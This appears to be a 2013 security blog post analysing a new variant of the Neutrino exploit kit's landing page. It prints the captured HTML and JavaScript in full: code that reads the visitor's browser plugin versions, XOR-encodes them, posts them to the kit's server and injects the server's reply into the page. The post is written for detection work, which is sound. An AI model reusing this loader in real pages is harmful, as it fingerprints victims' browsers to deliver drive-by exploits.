Tuesday, April 23, 2013

Neutrino Exploit Kit Landing pane change or variation


I picked up this today and it seem like the landing pane of Neutrino has changed. Gone is the random string generation after the prefixed h, i and p HTTP POST variables. The HTTP URL c(random string) is also hardcoded instead of random generated. The HTTP post request is also changed as there is no more h(random string). The i(random string) variable has grown beyond the previous limit of max 11 chars.

For the previous landing I have seen(reported by @kafeine and @malwaresigs) look at this post.
For a more thorough analysis look at "Neutrino Exploit Kit Analysis".

The new landing pane


<!DOCTYPE HTML>
<html>
    
    <head>
        <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
        <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
        <script type="text/javascript">
            $(document).ready(function () {АН
                602(
                    '517679ebaba2cc891d009dee',
                    'gbdlnep',
                    'cxiqocvbqd',
                    'pcnfjrcxxpu',
                    'ivexxbpclutvfxs');
            });

            function\ u0410\ u041d602(a, c, d, b, e) {
                a = {
                    hid: a,
                    plugins: {
                        adobe_reader: PluginDetect.getVersion("AdobeReader"),
                        java: PluginDetect.getVersion("Java"),
                        flash: PluginDetect.getVersion("Flash"),
                        quick_time: PluginDetect.getVersion("QuickTime"),
                        real_player: PluginDetect.getVersion("RealPlayer"),
                        shockwave: PluginDetect.getVersion("Shockwave"),
                        silver_light: PluginDetect.getVersion("Silverlight"),
                        vlc: PluginDetect.getVersion("VLC"),
                        wmp: PluginDetect.getVersion("WMP")
                    }
                };
                var f = {};
                f[b] = c;
                f[e] = encodeURIComponent(xor(JSON.stringify(a),
                    c));
                $.post(d, f, function (a) {
                    $("body").append(xor(decodeURIComponent(a), c))
                })
            }
            function xor(a, c) {
                for (var d = "", b = 0, e = 0, b = 0; b < a.length; b++) e = Math.floor(b % c.length), d += String.fromCharCode(a.charCodeAt(b) ^ c.charCodeAt(e));
                return d
            }
            JSON.stringify = JSON.stringify || function (a) {
                var c = typeof a;
                if ("object" != c || null === a) return "string" == c && (a = '"' + a + '"'), String(a);
                var d, b, e = [],
                    f = a && a.constructor == Array;
                for (d in a) b = a[d], c = typeof b, "string" == c ? b = '"' + b + '"' : "object" == c && null !== b && (b = JSON.stringify(b)), e.push((f ? "" : '"' + d + '":') + String(b));
                return (f ? "[" : "{") + String(e) + (f ? "]" : "}")
            };
        </script>
    </head>
    
    <body></body>

</html>


These changes gives us a new HTTP POST as well





If I'm wrong - Please correct me

Happy detecting Neutrino exploit kits :)

No comments:

Post a Comment